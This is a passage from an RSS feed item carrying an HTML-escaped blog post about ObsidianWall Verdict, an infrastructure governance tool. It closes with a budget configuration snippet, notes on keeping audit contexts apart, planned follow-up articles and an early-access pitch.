    &lt;/span&gt;&lt;span class="nl"&gt;"budget.amount"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;50.0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"budget.period"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"monthly"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two contexts are preserved separately — &lt;code&gt;input_context&lt;/code&gt; captures what came in from the infrastructure plan, &lt;code&gt;runtime_context&lt;/code&gt; captures the fully normalized state the evaluator actually saw. That separation matters for forensic reconstruction, compliance export, and replay — you can reproduce the exact evaluation state at any point in the future from the audit record alone.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;p&gt;This is the first article in a series on the architecture behind ObsidianWall.&lt;/p&gt;

&lt;p&gt;The next two cover:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How the enforcer/recommender separation preserves the AI authority boundary&lt;/strong&gt; — why the system that makes enforcement decisions must be architecturally isolated from the system that generates recommendations, and what happens to governance trust when that boundary is violated.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How programmable assurance differs from reactive governance&lt;/strong&gt; — why alerting, dashboards, and drift detection are fundamentally different abstractions from deterministic decision systems, and why that difference matters in AI-era infrastructure.&lt;/p&gt;

&lt;p&gt;ObsidianWall Verdict is currently in early access.&lt;/p&gt;

&lt;p&gt;If you are dealing with infrastructure budget overruns, compliance violations discovered after deployment, or policy drift across engineering teams — Verdict was built for exactly that problem.&lt;/p&gt;

&lt;p&gt;Early access: &lt;strong&gt;&lt;a href="https://obsidianwall.com" rel="noopener noreferrer"&gt;obsidianwall.com&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Aisha is the founder of ObsidianWall — a programmable assurance platform for deterministic governance and AI-native operational intelligence.&lt;/em&gt;&lt;/p&gt;




</description>
      <category>devops</category>
      <category>security</category>
      <category>python</category>
      <category>terraform</category>
    </item>
  </channel>
</rss>
